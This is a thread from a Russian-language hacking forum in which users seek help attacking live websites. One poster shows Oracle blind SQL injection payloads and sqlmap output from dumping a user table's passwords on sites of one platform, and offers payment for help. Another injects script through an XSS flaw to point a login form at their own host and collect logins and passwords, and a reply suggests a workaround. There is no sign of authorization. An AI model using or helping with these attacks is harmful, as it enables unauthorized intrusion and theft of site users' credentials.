ANTICHAT — форум по информационной безопасности, OSINT и технологиям

итак, ищем в гугле "IIRF.ini"

в первых 6 результатах видим:

вывод - IIS. ищем "iis configuration file"

находим: http://stackoverflow.com/questions/8...file-locations

К сожалению там нету такого файла, там одни только .dll файлы

Кто-нибудь может в личке помочь и глянуть один сайт? DB Oracle язвимость

Place: GET

Parameter: SL

Type: boolean-based blind

Title: Oracle boolean-based blind - GROUP BY and ORDER BY clauses

Payload: ...&SL=54,(SELECT (CASE WHEN (7590=7590) THEN 54 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Type: AND/OR time-based blind

Title: Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)

Payload: ....&SL=54,(SELECT (CASE WHEN (9646=9646) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(101)||CHR(9 7)||CHR(117),5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)

Всё выдётся отлично, вывод хороший, стабильный. Но вместо хеша или пароля в табличке юзоров выдаётся какая-то символьная фигня типа:

\x1c\x1f\x17\x18\x0ev\x1fjt\x15}

Притом это не на одном сайте, а на всех сайтах этой платформы.

Кто имеет время глянуть, напишите в личку, я скину урл. Очень важные для меня сайты на этой полатформе, я бьюсь в отчаянии, не знаю что делать. ПОМОГИТЕ!!!!!!

UPDATE: прогнала SQLMAP с режимом --binary-fields=PASSWORD, похоже, что пароли хранятся в бинарном виде. Выдаёт следующее:

157E02680F7F

1B0C130E197B620B7316

131E091001

171E0A0B057F620C7E12

00051D00087D6B087F17

171D1C0D0B676A08711D

0A00011F0A076F0F07600B0A

Что это за хеши такие? Oracle(DES)? или...? есть идеи?

PS можно платно

Почему у меня ничего не записывает php?

------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------

Вставляю этот скрипт

------------------------------------------------------------------------------------------------------------

document.lsform.action=‘http://hosting.ru/base.php’

------------------------------------------------------------------------------------------------------------

в страницу где форма

------------------------------------------------------------------------------------------------------------



------------------------------------------------------------------------------------------------------------

И ничего не происходит,в чем может быть проблема?

Почему информация об ошибке выводиться только при .php?c=1 group by . Если указывать ' , union , by order или любые другие способы, то ничего не выводит?

Нет инъекции. Только ошибка.

Почему когда вставляю код (

document.getElementById('lsform').action="http://МойХостинг1.ru/base.php?";)

на сайт где есть активная xss,то она преобразуется так (УязвимыйСайт.ru/base.php)и пишет что "страница не найдена" а на втором моем хостинге где расположена копия сайта (УязвимыйСайт.ru/forum.php) по адрессу (http://МойХостинг2.ru) то логины и пароли идут нормально после нажатия на кнопку Вход,и после нажатия она переадресовывается на ("http://МойХостинг1.ru/base.php?")Почему с (УязвимыйСайт.ru/forum.php) не идут пароли ?

Попробуйте так. Может там нормализатор ссылок обрезает http://